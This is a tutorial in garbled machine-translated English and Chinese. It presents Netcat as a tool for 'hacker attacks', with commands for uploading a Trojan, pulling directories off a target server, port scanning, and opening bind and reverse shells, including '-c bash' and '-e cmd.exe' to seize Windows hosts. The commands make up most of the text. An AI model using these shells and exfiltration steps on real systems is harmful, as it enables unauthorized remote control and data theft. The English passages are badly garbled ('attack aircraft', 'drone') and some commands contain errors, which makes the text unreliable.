Hacker attacks - how can understand Netcat

Netcat Chinese name: Swiss Army Knife
that there are small stature major functions: with listeners, transfer, telnet, get banner, text file transfer, encryption, remote control, streaming media, remote cloning hard disk.
In almost every install Linux, you simply shell Qiaoxia nc can see if there

nc

Format: nc [parameters] ip port [file]
Parameters:
-v: Detailed
-n: Do not be dns resolve
-l: listening
-p: Port
command execution after disconnection, bonding time: -q
how to upload Trojan nc demo
ubuntu server: execute nc -lp 4444> 1.txt

nc -lp 4444 > 1.txt

kali: performing nc -nv 192.168.176.144 4444 <1.txt

nc -nv 192.168.176.144 4444 < 1.txt -q 1

May
kali: execution: nc -lp 4444 <2.txt -q 1

nc -lp 4444 < 2.txt -q 1

ubuntu server: Execute: nc -nv 192.168.176.129 4444> 2.txt

nc -nv 192.168.176.129 4444  > 2.txt

Transfer directory:
can Tuoku the target server or upload EXP
Kali: implementation of tar -cvf - MITMF / | nc -lp 4444 -q 1
will first be packaged

tar -cvf - MITMF/ | nc -lp 4444 -q 1

ubuntu server: Execute: nc -nv 192.168.176.129 4444 | tar -xvf -

 nc -nv 192.168.176.129 4444 | tar -xvf -

Transmission success

ls

加密文件传输
kali 执行：nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
mcrypt是加密软件，–flush是解密后删除，-Fbqd为解密方法，rijndael-256为加密算法，加密方法 -m -ecb

nc -lp 444 | mcrypt  --flush -Fbqd -a rijndael-256 -m ecb > 3.txt

ubuntu服务器：执行mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -lp 444 ，加密3.txt文件，-Fbq为加密参数

mcrypt  --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1

流媒体服务
kali：执行cat 1.mp4 | nc -lp 4444

cat 1.mp4 | nc -lp 4444

ubuntu服务器：执行：nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -
mplayer为视频播放器，以视频流的方式缓存3000字的大小进行播放

nc -nv 192.168.176.129 4444 | mplayer -vo xll -cache 3000 -

NC扫描器
参数：-z：扫描模式，探测开放端口

nc -nvz 192.168.176.145 1-65535

-u：udp端口扫描

nc -nvzu 192.168.176.145 1-1024

远程控制
被控：nc -lp 4444 -c bash
-c：执行bash
正向远程：

nc -lp 4444 -c bash

kali：执行nc -nv 192.168.176.145 4444

nc -nv 192.168.176.145 4444

反向远程
kali：执行 nc -lp 4444

 nc -lp 4444

目标服务器：执行：nc -nv 192.168.176.129 4444 -c bash

nc -nv 192.168.176.129 4444 -c bash

如果你要拿下windows的权限
把-c改成-e，bash改成cmd.exe
win7下执行

nc -lp 4444 -e cmd.exe

kali下执行，直接拿到权限

 nc -nv 192.168.176.128 4444

The best reverse connection, the target server uses nc -nv attack aircraft ip port -e cmd.exe
and then attack aircraft to monitor the use of open nc -lp port, then perform the above phrase
netcat drawback
1. No authentication, easy to get the drone is connected to others.
2. No encrypted channel, easily arp spoofing, man in the middle attacks, sniffing.